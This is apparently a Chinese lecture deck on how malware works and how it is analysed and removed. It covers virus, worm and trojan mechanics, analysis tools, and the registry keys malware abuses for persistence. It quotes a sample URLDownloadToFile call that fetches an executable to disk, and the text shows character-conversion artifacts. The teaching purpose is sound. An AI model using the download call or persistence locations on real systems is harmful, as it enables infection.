惡意代碼的攻擊原理與監(jiān)測技術(shù)

惡意代碼的攻擊原理與監(jiān)測技術(shù)主講人：樊亦勝內(nèi)容什么是惡意代碼惡意代碼是如何工作的利用常規(guī)工具對惡意代碼進行分析惡意代碼的檢測與清除什么是惡意代碼惡意代碼的定義（一）惡意代碼是指故意編制或設(shè)置的、對網(wǎng)絡(luò)或系統(tǒng)會產(chǎn)生威脅或潛在威脅的計算機代碼。最常見的惡意代碼有計算機病毒、特洛伊木馬、計算機蠕蟲、后門、邏輯炸彈等。（百度百科）惡意代碼是嵌入到網(wǎng)頁的腳本，一般使用Javascript編寫，受影響的也是微軟視窗系統(tǒng)的InternetExplorer瀏覽器。它們在未經(jīng)瀏覽者同意的情況下自動打開廣告，開啟新頁面，嚴(yán)重影響瀏覽者的正常訪問。除此之外，它們還通過系統(tǒng)調(diào)用修改瀏覽器的默認(rèn)主頁，修改注冊表，添加系統(tǒng)啟動程序，設(shè)置監(jiān)視進程等。（WIKIPEDIA）惡意代碼的定義（二）惡意代碼（UnwantedCode）是指沒有作用卻會帶來危險的代碼，一個最安全的定義是把所有不必要的代碼都看作是惡意的，不必要代碼比惡意代碼具有更寬泛的含義，包括所有可能與某個組織安全策略相沖突的軟件。惡意代碼的分類計算機病毒（Virus）木馬程序（Trojan/BackdoorProgram）網(wǎng)絡(luò)蠕蟲（NetworkWorm）黑客程序（HackProgram）垃圾郵件（Spam）惡意網(wǎng)頁（MaliciousHTML）密碼竊取程序（PasswordStealer）間諜程序（Spyware）手機病毒一些具有代表性的惡意代碼1998年，CIH病毒1999年，梅麗莎(Melissa)2000年，愛蟲病毒(Iloveyou)2001年，紅色代碼(CodeRed)2003年，沖擊波(Blaster)2004年，震蕩波(Sasser)2006年，熊貓燒香(Nimaya)2007年，網(wǎng)游大盜、機器狗2008年，掃蕩波（Worm.SaodangBo.a.94208）2009年，木馬下載器、Conficker等變種2010年，極虎病毒2011年，鬼影病毒2013年，QVOD變種2012年的情況2012年1月-12月，瑞星“云安全”系統(tǒng)共截獲新增病毒樣本1,181萬余個。2012年全年截獲掛馬網(wǎng)站516萬個（以網(wǎng)頁個數(shù)統(tǒng)計），比2011年同期增加了48.7%。2012年，360安全中心共截獲新增惡意程序樣本13.7億個（以MD5計算），較2011年增加29.7%。2012年，360安全軟件攔截惡意程序攻擊415.8億次，較2011年增加了76.1%。2012年-2013年主要的惡意代碼Apache服務(wù)器mod_rewrite漏洞，超過半數(shù)服務(wù)器受到影響APT（AdvancedPersistentThreat）攻擊者利用flash中的可執(zhí)行代碼漏洞植入惡意代碼獲取網(wǎng)民和企業(yè)信息QVOD變種利用網(wǎng)頁視頻種入后門程序惡意代碼是如何工作的計算機病毒模塊傳染模塊破壞模塊引導(dǎo)模塊引導(dǎo)模塊引導(dǎo)模塊的功能是借助宿主程序，將病毒程序從外存引進內(nèi)存，以便使傳染模塊和破壞模塊進入活動狀態(tài)。病毒如何引導(dǎo)通過修改程序入口，寄生于程序文件修改磁盤引導(dǎo)扇區(qū)，結(jié)果啟動分區(qū)入口修改注冊表或啟動程序組利用系統(tǒng)服務(wù)利用系統(tǒng)和應(yīng)用程序擴展接口、hook函數(shù)BrowerHelperObjects（BHOs）IFSHook傳染模塊傳染模塊的功能將病毒迅速傳染，盡可能擴大染毒范圍。病毒的傳染模塊由兩部分組成：條件判斷部分和程序主體部分，前者負(fù)責(zé)判斷傳染條件是否成立，后者負(fù)責(zé)將病毒程序與宿主程序鏈接，完成傳染病毒的工作。傳染途徑U盤等存儲介質(zhì)網(wǎng)絡(luò)電子郵件系統(tǒng)漏洞破壞模塊病毒編制者的意圖，就是攻擊破壞計算機系統(tǒng)，所以破壞模塊是病毒程序的核心部分。網(wǎng)絡(luò)蠕蟲利用操作系統(tǒng)或應(yīng)用程序的漏洞，或者缺省配置的不安全性。產(chǎn)生特定的后門服務(wù)，或添加后門帳號。漏洞侵入后可執(zhí)行任何文件。系統(tǒng)缺省安裝存在這些漏洞，并且大多數(shù)的系統(tǒng)管理員并不主動打補丁。主動往網(wǎng)絡(luò)中發(fā)送數(shù)據(jù)（感染下一個機器或數(shù)據(jù)外泄）。蠕蟲的工作方式掃描由蠕蟲的搜索模塊負(fù)責(zé)探測存在漏洞的主機。當(dāng)程序向某個主機發(fā)送探測漏洞的信息并收到成功的反饋信息后，就得的了一個可攻擊的對象攻擊找到攻擊對象，取得對主機的權(quán)限，獲得一個shell，得到了這個shell后就可以獲得控制權(quán)。復(fù)制繁殖模塊通過原主機和新主機之間的交互，將蠕蟲程序復(fù)制到新主機并啟動蠕蟲傳播方式利用Windows操作系統(tǒng)漏洞傳播RPC漏洞(Blaster)利用應(yīng)用程序漏洞傳播FTP服務(wù)程序(Ramen)、IIS服務(wù)器漏洞(Nimda)、SQLServer數(shù)據(jù)庫(Slammer)利用瀏覽器傳播通過修改web服務(wù)器的內(nèi)容，把一小段JavaScript代碼附加到HTML或者ASP文件上，IE自動執(zhí)行代碼(Nimda,CodeRed)利用Email傳播通過MAPI獲得感染機器的通訊錄中郵件地址列表，通過Windows的郵件客戶端把蠕蟲代碼作為郵件附件發(fā)送給其他主機,而未打補丁的IE會自動執(zhí)行郵件中的附件，從而使蠕蟲激活.(求職信蠕蟲、小郵差蠕蟲)依賴網(wǎng)絡(luò)共享利用共享網(wǎng)絡(luò)資源進行傳播(Nimda)蠕蟲的攻擊行為消耗系統(tǒng)資源，降低系統(tǒng)性能造成網(wǎng)絡(luò)擁塞，實施拒絕服務(wù)攻擊利用弱口令攻擊蠕蟲與計算機病毒異同普通病毒蠕蟲病毒存在形式寄存文件獨立程序運行機制宿主程序運行主動攻擊感染目標(biāo)本地文件網(wǎng)絡(luò)計算機木馬程序木馬是一個程序，駐留在計算機里，可以隨計算機自動啟動并在某一端口進行偵聽，在對接收的數(shù)據(jù)識別后，對目標(biāo)計算機執(zhí)行特定的操作。其實質(zhì)只是一個通過端口進行通信的網(wǎng)絡(luò)客戶/服務(wù)程序。木馬原則上和Laplink、PCanywhere等程序一樣，只是一種遠(yuǎn)程管理工具木馬本身不帶傷害性，也沒有感染力，所以不能稱之為病毒(也有人稱之為第二代病毒)木馬的行為竊取數(shù)據(jù)接受操作者的指令遠(yuǎn)程管理服務(wù)器進程，監(jiān)視服務(wù)器操作篡改、刪除、修改文件和數(shù)據(jù)操縱注冊表、毀壞系統(tǒng)木馬的傳播以郵件附件方式傳播通過聊天工具傳播通過軟件下載的網(wǎng)絡(luò)傳播，把木馬程序捆綁在正常的文件中，用戶執(zhí)行安裝文件時就會運行木馬。通過一般的網(wǎng)絡(luò)病毒傳播通過光盤和磁盤傳播電子郵件一般針對Outlook/OutlookExpress。使用HTML格式的郵件，內(nèi)嵌腳本通過WindowsScriptingHost執(zhí)行附件程序。利用OutlookExpress或WindowsActiveDesktop的預(yù)覽功能進行自動傳播。通過“通訊簿”確定傳播目標(biāo)，標(biāo)題較吸引人，或會隨機改變，以迷惑收件人。利用常規(guī)工具對惡意代碼進行分析惡意代碼分析方法靜態(tài)分析在不運行惡意代碼的情況下，利用分析工具對惡意代碼的靜態(tài)特征和功能模塊進行分析的方法動態(tài)分析是通過監(jiān)視惡意代碼運行過程從而了解惡意代碼功能。靜態(tài)分析基于代碼特征的分析方法分析過程中，不考慮惡意代碼的指令意義，而是分析指令的統(tǒng)計特性、代碼的結(jié)構(gòu)特性等?；诖a語義的分析方法考慮構(gòu)成惡意代碼的指令的含義，通過理解指令語義建立惡意代碼的流程圖和功能框圖，進一步分析惡意代碼的功能結(jié)構(gòu)?；诖a特征的分析方法CreateMuetex函數(shù)創(chuàng)建互斥進程，如果進程中沒有指定進程實例，則創(chuàng)建一個互斥體如CreateMuetex(null,null,”bingdu”)，在生成的PE文件中會存在一個靜態(tài)數(shù)據(jù)“bingdu”，通過分析PE結(jié)構(gòu)可以從靜態(tài)數(shù)據(jù)節(jié)中提取靜態(tài)數(shù)據(jù)。URLDownloadToFile函數(shù)URLDownloadToFile(0,"http:///bingdu.exe","c:\\bingdu.exe",0,0)從網(wǎng)站下載可執(zhí)行程序到C盤根目錄基于代碼語義的分析方法基于代碼語義的分析過程，首先使用反匯編工具對惡意代碼執(zhí)行體進行反匯編，然后通過理解惡意代碼的反匯編程序了解惡意代碼的功能。動態(tài)分析方法觀察法利用系統(tǒng)監(jiān)視工具觀察惡意代碼運行過程時系統(tǒng)環(huán)境的變化，通過分析這些變化判斷惡意代碼的功能。調(diào)試法通過跟蹤惡意代碼執(zhí)行過程使用的系統(tǒng)函數(shù)和指令特征分析惡意代碼功能的技術(shù)。觀察法惡意代碼作為一段程序在運行過程中通常會對系統(tǒng)造成一定的影響，有些惡意代碼為了保證自己的自啟動功能和進程隱藏的功能，通常會修改系統(tǒng)注冊表和系統(tǒng)文件，或者會修改系統(tǒng)配置。通過網(wǎng)絡(luò)進行傳播、繁殖和拒絕服務(wù)攻擊等破壞活動通過網(wǎng)絡(luò)進行詐騙等犯罪活動通過網(wǎng)絡(luò)將搜集到的機密信息傳遞給惡意代碼的控制者在本地開啟一些端口、服務(wù)等后門等待惡意代碼控制者對受害主機的控制訪問調(diào)試法單步跟蹤惡意代碼執(zhí)行過程，監(jiān)視惡意代碼的每一個執(zhí)行步驟，在分析過程中也可以在適當(dāng)?shù)臅r候執(zhí)行惡意代碼的一個片斷，這種分析方法可以全面監(jiān)視惡意代碼的執(zhí)行過程，但是分析過程相當(dāng)耗時。利用系統(tǒng)hook技術(shù)監(jiān)視惡意代碼執(zhí)行過程中的系統(tǒng)調(diào)用和API使用狀態(tài)來分析惡意代碼的功能，這種方法經(jīng)常用于惡意代碼檢測。惡意代碼分析流程分析惡意代碼的加密和壓縮特性評估惡意代碼運行過程中對系統(tǒng)文件、注冊表和網(wǎng)絡(luò)通訊狀態(tài)的影響判斷惡意代碼的功能模塊構(gòu)成對惡意代碼進行單步跟蹤調(diào)試，進行確認(rèn)形成詳細(xì)報告常用分析工具（演示）RegmonFilemonPEToolsOllyICE惡意代碼的檢測與清除惡意代碼檢測基本步驟確定惡意代碼進程分析病毒行為清除代碼文件、修改的注冊表清除被感染文件中的惡意代碼恢復(fù)系統(tǒng)設(shè)置確定惡意代碼進程進程插入利用HOOK利用APPINIT加殼進程關(guān)于APPINITAppInit_Dlls鍵值位于注冊表HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows任何使用到User32.dll的EXE、DLL、OCX等類型的PE文件都會讀取這個地方，并且根據(jù)約定的規(guī)范將這個鍵值下指向的DLL文件進行加載，加載的方式是調(diào)用LoadLibraryPE格式PE的意思就是PortableExecutable（可移植的執(zhí)行體）。它是Win32環(huán)境自身所帶的執(zhí)行體文件格式。它的一些特性繼承自Unix的Coff(commonobjectfileformat)文件格式。關(guān)于映像劫持所謂的映像劫持（IFEO）就是ImageFileExecutionOptions，它位于注冊表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\鍵值下。容易感染的注冊表項run/runonce/runserviceexefile/comfile/txtfile…等文件關(guān)聯(lián)HKEY_CLASSES_ROOT\.exe\(默認(rèn))的取值（exefile）HKEY_CLASSES_ROOT\exefile\Shell\Open\Command\(默認(rèn))的取值（”%1”%*）例如txtfile\(默認(rèn))=“NOTEPAD.EXE%1”InternetExplorer參數(shù)設(shè)置（修改主頁等）HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Policies分支HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\容易感染的注冊表項（續(xù)）BHOsHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\BrowserHelperObje